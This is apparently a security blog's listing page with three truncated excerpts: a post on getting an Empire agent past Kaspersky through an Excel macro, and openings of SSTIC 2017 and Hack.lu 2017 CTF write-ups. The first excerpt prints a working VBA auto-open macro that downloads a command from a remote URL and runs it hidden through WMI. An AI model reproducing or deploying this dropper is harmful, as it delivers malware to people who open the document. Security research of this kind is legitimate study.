Author: m0rphine

Bypassing Kaspersky to execute a malicious macro

I always heard bypassing AVs was really easy, and I wanted to see it for myself. The goal here was to execute an Empire agent through a malicious macro. AVs tend to dislike macros for good reasons, so I figured it would give me a good overview of the difficulty. Surprisingly, I couldn't find a working example anywhere. There is obviously a lot of literature on AV evasion techniques online, and even tools that claim to bypass AVs, but somehow I couldn't make them work to execute an Empire agent from a macro. I won't go too much into detail; I'll just point out the main techniques I used and where I got them from. So here it is:

    Private Sub Workbook_Open()
        ' Fetch the payload (a command line) from a remote URL
        Dim myURL As String
        myURL = "http://URL:PORT/PAYLOAD"
        Dim WinHttpReq As Object
        Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")
        WinHttpReq.Open "GET", myURL, False
        WinHttpReq.send
        Dim payload
        payload = WinHttpReq.ResponseText
        If WinHttpReq.Status = 200 Then
            ' Launch the downloaded command through WMI with a hidden window
            Const HIDDEN_WINDOW = 5
            strComputer = "."
            Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
            Set objStartup = objWMIService.Get("Win32_ProcessStartup")
            Set objConfig = objStartup.SpawnInstance_
            objConfig.ShowWindow = HIDDEN_WINDOW
            Set objProcess = GetObject("winmgmts:root\cimv2:Win32_Process")
            errReturn = objProcess.Create(payload, Null, objConfig, intProcessID)
        End If
    End Sub

The previous code is pretty…

SSTIC S2017E03 – RISCY Zones

Symposium sur la Sécurité des Technologies de l'Information et des Communications is a security conference held each year in Rennes, France. Each year, they release a challenge usually divided into several smaller tasks. 2017 was my third participation and, just like the previous editions, it has proven to be really challenging and interesting, so I highly recommend giving it a try! Today's post will be a write-up of the 3rd task. I particularly enjoyed this one, so I'm gonna share it here.

Background:

Once you complete the first task, you're given instructions to set up the environment for the rest of the challenge, and here's what it looks like when you're done doing it:

What you're seeing is an OpenRISC 1000 virtual machine written in JavaScript (based on the open-source project jor1k) and executed in a web browser. It is worth mentioning the presence of a Trusted Execution Environment (TEE), in the shape of a second virtual machine, this time for the RISC-V architecture.

First approach:

The zip archive contains 4 files:

2 binaries:
    TA.elf.signed: ELF 32-bit LSB executable, UCB RISC-V, version 1 (SYSV), statically linked, not stripped
    trustzone_decrypt: ELF 32-bit MSB…

First post : Hacklu 2017 CTF – Exam (Pwn 200)

Description:

Growing up and being bored in school, Samual Jr. takes a look at different cloud-driven options for exam preparation. Reaching for the stars takes more than just math, right? Teach him a lesson!

nc flatearth.fluxfingers.net 1745

First steps:

Let's take a quick look at the binary:

    ➜ exam ~/tools/checksec.sh/checksec --file exam
    RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FORTIFY   Fortified   Fortifiable   FILE
    Full RELRO      Canary found      NX enabled    PIE enabled     No RPATH   No RUNPATH   Yes       0           4             exam
    ➜ exam file exam
    exam: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=9be14b9fa354dbb844460d8d07daa6cd7c2ee40a, not stripped

Considering the hardening mechanisms in place (PIE, RELRO, Stack Canary, NX) and the low amount of points (200), we shouldn't look for something too fancy like ROP in order to complete the challenge. I went ahead and ran the program to see what it did:

    ➜ exam ./exam
    Welcome to ExamSim!
    Here you can augment your exam preparation work with automated crib creation capabilities.
    Our algorithm will hand pick only the most important facts from your previous summaries to allow you to push your grades to the next level!
    ========
    1. add summary…